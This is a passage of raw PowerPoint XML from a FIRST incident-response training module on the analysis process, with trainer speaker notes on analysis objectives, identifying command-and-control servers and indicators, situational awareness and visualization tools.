          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>There are proprietary tools available if you are a government, national, or regional CSIRT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Your objective is to identify and clarify tactics such as (a) what servers are used for Command &amp; Control; (b) what are the indicators you can use to recognize compromise; (c) what are other data points you can use to develop actionable information. While analyzing this new information, you’ll want to search through your existing security storage to see if you can find any related data that you can correlate to lead to more actionable information. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8126B0-A693-EF4C-A499-B2C71C028917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{67D1E3A3-4EFD-194B-8B69-0A6ED67A5A29}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63493" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AACFBA-650B-F14D-AC61-6336F5702EE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="6530975"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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42" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39DEC3AF-0E13-1F45-9DCA-06270CD45F47}"/>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0CF8AD55-88D6-3F4A-9E1A-557FBF102628}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57345" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5795FD85-BE4D-9342-B7AD-B56F61DFD103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441325" y="3984625"/>
            <a:ext cx="5973763" cy="4775200"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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000" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Agenda: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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000" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Performing analysis is one of your main job responsibilities and a critical one. By the end of this module, you will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Justify adequate analysis time leading to improved outcomes for actionable information and explain why allowing for adequate analysis time will lead to improved outcomes for actionable information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Explain why continually ensuring source quality is imperative. We have touched on this before: the fact that the quality of a source may change over time. You will be able to explain why your team will want to circle back and revalidate the quality of your various sources. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Generate superior quality conclusions by intelligently correlating a wealth of sources. As your team grows the overall knowledge of your environment, you will be able to better combine the information from various sources to generate the most accurate conclusions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Proactively perform exploratory analyses to augment your knowledge base. Your job is not only reactive but also proactive. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Develop situational awareness to improve decision-making.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Develop and track metrics to determine your team’s performance. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Use visualization tools to enhance understanding and effectiveness. As we will see in this module, visualization tools are valuable to enhance the understanding and effectiveness of an individual situation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Although this is the phase that is least conducive to automation, as with other phases, employ and expand automation whenever possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Consume community information and share new insights as much as is appropriate. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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000" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Okay, now that we have established the objectives of the Analysis Process, let’s look at the details.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D24750A-FD6F-D747-8D7E-22BAED786F64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{942292F7-EF1C-134D-B52A-DF956DFD220A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6608763" y="8931275"/>
            <a:ext cx="247650"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{63E7CDD8-C590-4644-A4F8-C5888423F966}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans"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5538" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD02168-F569-0141-8EF8-1A054950B5C0}"/>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F23215BA-B47E-AD45-9308-92537317E3B3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84993" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{732ABCB5-3A7F-854F-AFC4-A7172C2A6B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325438" y="4343400"/>
            <a:ext cx="6205537" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Visualization Aids in Situational Awareness: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>2 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> We talked earlier about using visualization while discussing a general overview of investigation. We are now talking about using the same type of tools to enhance situational awareness. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Visualization:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Allows huge amounts of information to become comprehensible;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Is useful both in investigation and also situational awareness;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Can include charts, graphs, maps, and other representations. These representations can be static or interactive. If static representation is sufficient, that is most effective. But being able to see changes over time or being able to zoom in with interactive tools is often important to your research. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>There are a number of different representations. A few of the most popular are listed above. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> What tools for visualization do you use at your organization? And are they home-grown or developed externally? What are your best successes? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> to learner responses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> We have now covered the key areas of situational awareness: general concepts, internal and external situational awareness, and visualization to improve situational awareness. The next topic we will cover is using metrics during the investigation phase.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65540" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A8F834-5AEC-324E-82F8-5780CEA49495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{48013A12-66DA-1043-87C0-BF357644AC55}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10CC5BDC-7FD9-CE49-8331-BC72D5193861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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7586" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256CD0F0-7F22-8146-B335-585C422229C7}"/>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1CAF9E09-F4F0-8A41-A292-5890CBBF545E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8733FA34-B382-094D-87AF-136C80055C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="695325"/>
            <a:ext cx="4572000"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7588" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A5B9190-7297-234D-9D11-81798E80B6BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>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tIns="17780"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Droid Sans Fallback" charset="0"/>
              <a:cs typeface="Droid Sans Fallback" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spot malware migrations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Display exposures at edges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
